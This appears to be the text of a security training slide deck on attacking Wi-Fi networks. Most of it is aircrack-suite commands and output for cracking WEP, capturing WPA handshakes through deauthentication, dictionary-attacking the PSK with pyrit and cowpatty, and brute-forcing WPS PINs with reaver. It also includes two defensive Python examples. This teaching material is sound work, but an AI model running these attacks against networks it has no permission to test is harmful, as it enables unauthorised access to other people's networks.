16:24:43.170518 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:43.173590 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 327
16:24:43.176662 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.181784 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 311
16:24:43.187416 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300
CH 11 ][ Elapsed: 4 s ][ 2012-02-27 21:14
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
2E:74:C2:BA:A5:8A -87 2 0 0 3 54e WPA2 CCMP PSK iPhone de Marcelo
00:25:9C:36:0A:EF -45 3 0 0 1 54 WPA2 CCMP PSK Homenet54
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:1B:77:7C:2C:A7 -86 0 - 1 68 8 Notebook
(not associated) 00:21:29:65:B8:45 -47 0 - 1 7 2 LABVIRUS
CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W
00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal
BSSID STATION PWR Rate Lost Frames Probe
(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W
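The airodump-ng tables above already contain everything a defender needs for a first risk inventory: an open network, a WEP network, a WPA2 network still using TKIP, PSK networks, and an 802.1X (MGT) network, plus the Probe column showing what clients advertise. The following Python is an added example, not part of the aircrack-ng suite: it parses a constructed copy of these rows in the airodump-ng layout (anchoring on the ENC keyword because the numeric columns shift depending on whether RXQ is shown and on how MB is printed), looks the vendor up in a constructed OUI table that holds only the one prefix the slides grep for, and assigns each AP a risk level.

```python
"""Turn an airodump-ng screen into a risk inventory: which networks are open,
which still run WEP or TKIP, which rely on a pre-shared key, and which are
802.1X. Added example, not part of the aircrack-ng suite; the table below is
a constructed copy in the airodump-ng layout shown on the slides, and the OUI
table holds only the one prefix the slides look up."""
import re

# Constructed copy of airodump-ng output (BSSID PWR [RXQ] Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID).
SAMPLE_AIRODUMP = """\
CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W
00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal
00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS
2E:74:C2:BA:A5:8A -87 2 0 0 3 54e WPA2 CCMP PSK iPhone de Marcelo
BSSID STATION PWR Rate Lost Frames Probe
(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel
"""

# Constructed OUI table in airodump-ng-oui.txt style; only 00-25-9C comes from the slides.
OUI_TABLE = {"00-25-9C": "Cisco-Linksys, LLC"}

MAC_RE = re.compile(r"^(?:[0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)
ENC_WORDS = {"OPN", "WEP", "WPA", "WPA2", "WPA2WPA"}
CIPHER_WORDS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP", "WRAP"}
AUTH_WORDS = {"OPN", "SKA", "PSK", "MGT"}


def vendor(bssid: str) -> str:
    return OUI_TABLE.get(bssid[:8].upper().replace(":", "-"), "unknown")


def parse_ap_row(line: str):
    """Parse one AP row; returns None for headers, station rows and blank lines."""
    tokens = line.split()
    if len(tokens) < 8 or not MAC_RE.match(tokens[0]):
        return None
    # The numeric columns vary (RXQ only appears with -c, MB may print as "54 ."),
    # so anchor on the first ENC keyword instead of on fixed positions.
    enc_idx = next((i for i, t in enumerate(tokens) if i >= 7 and t in ENC_WORDS), None)
    if enc_idx is None:
        return None
    left = tokens[:enc_idx]
    if left[-1] == ".":                       # short-preamble marker split from the MB value
        left = left[:-1]
    rest = tokens[enc_idx + 1:]
    ciphers = []
    while rest and rest[0] in CIPHER_WORDS:
        ciphers.append(rest.pop(0))
    auth = rest.pop(0) if rest and rest[0] in AUTH_WORDS else None
    return {
        "bssid": tokens[0].upper(), "vendor": vendor(tokens[0]), "power": int(tokens[1]),
        "channel": int(left[-2]), "rate": left[-1], "enc": tokens[enc_idx],
        "cipher": ciphers, "auth": auth, "essid": " ".join(rest),
    }


def assess(ap: dict) -> str:
    """Defender's verdict for one AP, from weakest to strongest configuration."""
    if ap["enc"] == "OPN":
        return "critical: open network, all traffic readable in range"
    if ap["enc"] == "WEP":
        return "critical: WEP, key recoverable from captured traffic"
    if "TKIP" in ap["cipher"]:
        return "high: TKIP cipher, migrate to WPA2/CCMP"
    if ap["auth"] == "PSK":
        return "medium: pre-shared key, strength rests on the passphrase; check WPS is off"
    if ap["auth"] == "MGT":
        return "low: 802.1X (enterprise), verify clients validate the RADIUS certificate"
    return "unknown"


def inventory(text: str) -> list:
    aps = [ap for ap in map(parse_ap_row, text.splitlines()) if ap]
    for ap in aps:
        ap["risk"] = assess(ap)
    return aps


def count_by_level(aps: list) -> dict:
    out = {}
    for ap in aps:
        level = ap["risk"].split(":")[0]
        out[level] = out.get(level, 0) + 1
    return out


if __name__ == "__main__":
    for ap in inventory(SAMPLE_AIRODUMP):
        print(f"{ap['bssid']} ch{ap['channel']:>3} {ap['enc']:<5} {ap['essid']!r:<22} {ap['risk']}")
```

Feeding it the text of `airodump-ng -w <prefix>` captures over time gives a per-site list of networks that should not exist (OPN, WEP) and of configurations to schedule for migration (TKIP), which is the defensive counterpart of the scan the slides use to pick a target.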
# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0
09:57:07 Created tap interface at0
09:57:07 Trying to set MTU on at0 to 1500
09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10 SKA from E0:F8:47:C3:30:14
09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10 Ignored IPv6 packet.
09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10 Added ARP packet to cfrag buffer.
# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap
Aircrack-ng 1.1 r2076
[00:00:00] Tested 798 keys (got 38085 IVs)
KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)
KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )
Decrypted correctly: 100%
AP without clients
Migration WPA-WEP
WPA
CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee
00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar
00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0
CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 254839 packets.
# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 698 packets.
# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake)
Choosing first network as target.
Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol
39965 377.079356 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 131 Key (msg 1/4)
39968 377.086048 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 160 Key (msg 2/4)
39969 377.089080 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 187 Key (msg 3/4)
39971 377.104480 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 136 Key (msg 4/4)
aireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Waiting for beacon frame (ESSID: dlink) on channel 6
Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink".
08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
aircrack-ng dlink-01.cap
Opening dlink-01.cap
Read 60093 packets.
# BSSID ESSID Encryption
1 00:1B:11:50:2F:2E dlink WPA (1 handshake)
Aircrack-ng 1.1
[00:01:09] 88192 keys tested (1274.66 k/s)
KEY FOUND! [ pxxxxxxxxxxxxxxxx ]
Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4
Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3
EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2
real 1m9.538s
user 4m18.786s
sys 0m0.629s
time aircrack-ng -w popular_ptBR.dic dlink-01.cap
time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink
[…]
109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second
real 9m2.988s
user 9m2.468s
sys 0m0.414s
time genpmk –f popular.dic -d dlink234.pmk -s dlink
[…]
109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second
real 9m2.988s
user 9m2.468s
sys 0m0.414s
time pyrit -i popular.dic -o dlink.pmk -e dlink passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Computed 109216 PMKs total; 1865 PMKs per second
real 1m20.753s
user 5m2.437s
sys 0m0.753s
Cowpatty
cowpatty -d dlinkpop.pmk -s dlink -r dlink-01.cap
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 10000: 22222222
key no. 20000: 93833104
key no. 30000: And48560
key no. 40000: Cib00043
key no. 50000: enqetm17
key no. 60000: hamdan00
key no. 70000: liberta10
key no. 80000: Mil08187
The PSK is "pxxxxxxxxxxxxxxxxxx".
89038 passphrases tested in 0.68 seconds: 130724.27 passphrases/second
time pyrit -r dlink-01.cap -i t-br_popular.dic attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'dlink-01.cap' (1/1)...
Parsed 19 packets (19 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.
Tried 109216 PMKs so far; 1870 PMKs per second.
The password is 'pxxxxxxxxxxxxx'.
real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (1239.9 PMKs/s)... \
Computed 1239.93 PMKs/s total.
#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (1880.5 PMKs/s)... /
Computed 1880.52 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 361.3 PMKs/s (RTT 2.9)
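The numbers in this section (about 1,270 keys/s for aircrack-ng, 200 passphrases/s for genpmk, 1,865 PMKs/s for pyrit on the CPU, 130,000/s for cowpatty once the PMKs are precomputed) all follow from one fact: each candidate passphrase must go through PBKDF2-HMAC-SHA1 with 4,096 iterations, salted with the SSID, before it can be checked against the handshake. The following Python is an added example, not from the slides or from any of the tools shown: it derives the PMK the way 802.11i specifies (checked against the standard's published test vector), shows why a table precomputed for one SSID is worthless for any other SSID, and measures the per-core rate on the machine it runs on. The word list and SSIDs are constructed.

```python
"""Why a WPA/WPA2-PSK dictionary run is slow and why genpmk/pyrit precomputation
is tied to one SSID: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
Added example, not from the original slides or any of the tools shown; the only
non-constructed value is the IEEE 802.11i test vector (passphrase "password",
SSID "IEEE"). The word list and SSIDs below are constructed."""
import hashlib
import time


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """The 802.11i passphrase-to-PSK mapping; the SSID is the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def build_pmk_table(ssid: str, wordlist) -> dict:
    """What genpmk -s <ssid> / pyrit -e <ssid> passthrough produce: one PMK per word,
    computed once, reusable against every handshake captured from that SSID."""
    return {word: pmk_from_passphrase(word, ssid) for word in wordlist}


def lookup_pmk(table: dict, table_ssid: str, target_ssid: str, word: str) -> bytes:
    """A table is only valid for the SSID it was salted with; anything else is recomputed."""
    if table_ssid == target_ssid and word in table:
        return table[word]
    return pmk_from_passphrase(word, target_ssid)


def benchmark(ssid: str = "dlink", seconds: float = 0.5) -> float:
    """Passphrases per second on one core, the figure cowpatty/pyrit/aircrack report."""
    count, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        pmk_from_passphrase(f"constructed-candidate-{count}", ssid)
        count += 1
    return count / (time.perf_counter() - start)


if __name__ == "__main__":
    rate = benchmark()
    print(f"{rate:.0f} passphrases/s on this core; 109216 words take {109216 / rate:.0f} s")
    # Same passphrase, different SSID: the precomputed PMK no longer applies.
    print(pmk_from_passphrase("password", "dlink").hex())
    print(pmk_from_passphrase("password", "dlink-7f3a").hex())
```

Two defensive conclusions fall out of the code: a default SSID such as "dlink" lets anyone reuse a table computed once, so a unique SSID forces the full PBKDF2 cost per guess; and because that cost is fixed by the standard, the only lever left to the network owner is passphrase length and unpredictability (or 802.1X, where there is no shared passphrase to guess).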
WPS attack
[figure: WiFi Protected Setup: recover configuration, reconfigure AP, Registrar, PIN]
# wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------------
48:5B:39:B0:2D:2C  3        -54   1.0          No          LABVIRUS
# reaver -i mon0 -b 48:5B:39:B0:D0:2C -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 48:5B:39:B0:D0:2C
[+] Associated with 48:5B:39:B0:D0:2C (ESSID: LABVIRUS)
[+] Trying pin 12345670
[+] WPS PIN: '12345670'
[+] WPA PSK: 'labvirus2013'
[+] AP SSID: 'LABVIRUS'
Doubts?
Questions?
Criticism?
Suggestions?
Follow Clavis
http://clav.is/slideshare
http://clav.is/twitter
http://clav.is/facebook
Thank you very much!
monitoria@clavis.com.br
academia@clavis.com.br
Nelson Murilo
Clavis Segurança da Informação